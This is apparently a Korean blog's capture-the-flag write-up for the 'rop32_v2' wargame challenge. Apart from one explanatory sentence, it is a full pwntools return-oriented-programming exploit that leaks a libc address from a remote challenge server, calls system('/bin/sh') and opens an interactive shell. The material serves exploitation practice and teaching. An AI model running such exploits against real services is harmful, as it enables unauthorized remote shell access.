rop32에서 함수의 주소값을 넣어줘야지 되는것과, write함수를 사용해야 하는것이 달라졌습니다.
from pwn import *
context.log_level = 'debug'
e = ELF('./ropasaurusrex')
r = remote('sunrin.site', 9005)
libc = ELF('./libc.so.6')
pppret = 0x080484b6
payload = 'A' * (0x88 + 4)
payload += p32(e.plt['write'])
payload += p32(pppret)
payload += p32(1)
payload += p32(e.got['write'])
payload += p32(0x4)
payload += p32(0x804841d)
r.sendline(payload)
_write = u32(r.recvuntil('\xf7'))
_base = _write - libc.sym['write']
_system = _base + libc.sym['system']
_binsh = e.bss() + 0x10
payload = 'A' * (0x88 + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)
payload += p32(_binsh)
payload += p32(0x20)
payload += p32(0x804841d)
r.sendline(payload)
r.sendline('/bin/sh\x00')
payload = 'A' * (0x88 + 4)
payload += p32(_system)
payload += 'A' * 4
payload += p32(_binsh)
r.sendline(payload)
r.interactive()728x90
'해킹 > writeup' 카테고리의 다른 글
| 20. sung.pw - BaskinRobins31 (0) | 2021.08.01 |
|---|---|
| 19. sung.pw - rop64_v2 (0) | 2021.08.01 |
| 17. sung.pw - rop32_v2 (0) | 2021.08.01 |
| 16. sung.pw - rop32 (0) | 2021.08.01 |
| 15. Dreamhack - basic_rop_x64 (0) | 2021.08.01 |